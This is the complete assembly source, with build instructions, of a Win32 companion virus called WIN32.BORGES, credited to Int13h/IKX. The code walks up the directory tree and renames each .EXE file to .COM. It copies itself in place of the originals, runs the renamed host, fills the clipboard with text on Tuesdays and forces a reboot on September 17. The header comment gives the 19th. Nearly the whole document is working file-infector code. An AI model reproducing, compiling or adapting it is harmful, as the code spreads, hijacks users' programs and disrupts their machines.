; ----------------> WIN32.BORGES Virus by Int13h/IKX <-----------------; ; It mirrores EXEs files, navegates directories with the famous dot-dot; ; method, on september 19 reboots the machine; on tuesdays puts a text; ; in the clipboard. This beast works using API for all its operations,; ; no dirty tricks are used. Just to mantain compatibility :); ; Dedicated to Jorge Luis Borges, because the first tale of his book; ; named "The book of sand" is called "The other", and it speaks about; ; an encounter with a younger copy of himself. The famous doppelganger.; ; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - cd13- -; ; ; ; COMPILATION: ; ; tasm32 /ml /m3 borges.asm,,; ; ; tlink32 /Tpe /aa /c /v borges.obj,,, import32.lib, ; ; .386 .model flat locals extrn FindFirstFileA:PROC extrn FindNextFileA:PROC extrn SetCurrentDirectoryA:PROC extrn GetCurrentDirectoryA:PROC extrn GetSystemTime:PROC extrn MoveFileA:PROC extrn CopyFileA:PROC extrn GlobalAlloc:PROC extrn GlobalLock:PROC extrn GlobalUnlock:PROC extrn OpenClipboard:PROC extrn SetClipboardData:PROC extrn EmptyClipboard:PROC extrn CloseClipboard:PROC extrn GetCommandLineA:PROC extrn CreateProcessA:PROC extrn lstrcpyA:PROC extrn MessageBoxA:PROC extrn ExitWindowsEx:PROC extrn ExitProcess:PROC .DATA TituloVentana db 'WIN32.BORGES VIRUS by Int13h/IKX',0 TextoVentana db 'Made in Paraguay, South America',0 MemHandle dd 0 Victimas db '*.EXE',0 SearcHandle dd 0 Longitud dd 0 ProcessInfo dd 4 dup (0) StartupInfo dd 4 dup (0) Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0 Hallado db 200 dup (0) Crear db 200 dup (0) ParaCorrer db 200 dup (0) Original db 200 dup (0) Actual db 200 dup (0) PuntoPunto db '..',0 SystemTimeStruc dw 0,0,0,0,0,0,0,0 .CODE BORGES: mov eax,offset SystemTimeStruc push eax call GetSystemTime mov ax,word ptr offset [SystemTimeStruc+2] cmp al,9 jne NoFQVbirthday mov ax,word ptr offset [SystemTimeStruc+6] cmp al,17 je Adios NoFQVbirthday: push offset Original push 000000C8h call GetCurrentDirectoryA mov dword ptr [Longitud],eax call GetCommandLineA push eax push offset ParaCorrer call lstrcpyA mov edi,eax Buscar: cmp byte ptr [edi],'.' jz ElPunto inc edi jmp Buscar ElPunto:mov esi,edi inc esi add edi,4 mov byte ptr [edi],00 Carrousell: call InfectDirectory push offset PuntoPunto call SetCurrentDirectoryA push offset Actual push 000000C8h call GetCurrentDirectoryA cmp eax,dword ptr [Longitud] je Salida mov dword ptr [Longitud],eax jmp Carrousell InfectDirectory: push offset Win32FindData push offset Victimas call FindFirstFileA mov dword ptr [SearcHandle],eax Ciclo: cmp eax,-1 je Salida or eax,eax jnz Continuar ret Continuar: push offset Hallado push offset Crear call lstrcpyA mov edi,offset Crear SeguirBuscando: cmp byte ptr [edi],'.' jz PuntoEncontrado inc edi jmp SeguirBuscando PuntoEncontrado: inc edi mov dword ptr [edi],0004d4f43h push offset Crear push offset Hallado call MoveFileA push 0 push offset Hallado push offset ParaCorrer+1 call CopyFileA push offset Win32FindData push dword ptr [SearcHandle] call FindNextFileA jmp Ciclo FillClipboard: push 0 call OpenClipboard call EmptyClipboard push (offset TextoVentana-offset TituloVentana) push 00000002 ; GMEM_MOVEABLE call GlobalAlloc push eax mov dword ptr [MemHandle],eax call GlobalLock push eax push offset TituloVentana push eax call lstrcpyA call GlobalUnlock push dword ptr [MemHandle] push 00000001 ; CF_TEXT call SetClipboardData call CloseClipboard jmp Run4theNight Adios: push 00000001 push offset TituloVentana push offset TextoVentana push 0 call MessageBoxA push 0 push 00000002 ; EWX_REBOOT call ExitWindowsEx Salida: push offset Original call SetCurrentDirectoryA mov ax,word ptr offset [SystemTimeStruc+4] cmp al,2 je FillClipboard Run4theNight: push offset ProcessInfo push offset StartupInfo sub eax,eax push eax push eax push 00000010h push eax push eax push eax call GetCommandLineA inc eax push eax Done: mov dword ptr [esi],0004d4f43h push offset ParaCorrer+1 call CreateProcessA push 0 call ExitProcess Ends End BORGES